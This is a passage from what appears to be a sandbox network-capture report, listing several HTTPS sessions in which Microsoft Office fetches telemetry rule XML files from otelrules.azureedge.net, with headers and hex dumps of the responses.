                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:47 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1360
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                x-ms-request-id: e88bdfa1-301e-003f-630e-3d266f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155447Z-178bfbc474b7cbwqhC1NYC8z4n00000004gg00000000gh0r
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:47 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                118192.168.2.44995313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:47 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:47 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1390
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155447Z-174c587ffdf59vqchC1TEByk6800000003d00000000000vt
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:47 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                119192.168.2.44995213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:47 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:47 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                x-ms-request-id: ee240466-601e-00ab-24f2-3a66f4000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155447Z-178bfbc474bgvl54hC1NYCsfuw00000004h000000000mu66
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:47 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                120192.168.2.44995413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:47 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:47 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1401
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                x-ms-request-id: 45241df0-c01e-00a1-1a4f-3c7e4a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155447Z-178bfbc474bp8mkvhC1NYCzqnn00000004f000000000dn2a
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:47 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                121192.168.2.44995513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:47 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:47 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1364
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                x-ms-request-id: c7391ddf-401e-0064-3568-3b54af000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155447Z-174c587ffdftjz9shC1TEBsh98000000030g00000000an0b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:48 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                122192.168.2.44995613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:49 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:49 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1391
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                x-ms-request-id: ca5d4909-001e-0014-074d-3c5151000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155449Z-15b8b599d88wk8w4hC1TEB14b8000000032g00000000k58k
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:49 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                123192.168.2.44995813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:49 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:49 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1403
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155449Z-178bfbc474b9xljthC1NYCtw9400000004f000000000mhd0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:50 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                124192.168.2.44995713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:49 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:49 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1354
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                x-ms-request-id: 119e228c-001e-0046-1663-3bda4b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155449Z-178bfbc474bvjk8shC1NYC83ns00000004fg00000000d05q
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:50 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                125192.168.2.44995913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:49 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:50 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1366
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                x-ms-request-id: 652d7de6-201e-0033-5d3c-3cb167000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155450Z-178bfbc474bq2pr7hC1NYCkfgg00000004vg000000006hys
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:50 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                126192.168.2.44996013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:49 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:50 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                x-ms-request-id: 2df0f233-b01e-0084-4f11-3dd736000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155450Z-178bfbc474b7cbwqhC1NYC8z4n00000004n00000000067sd
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
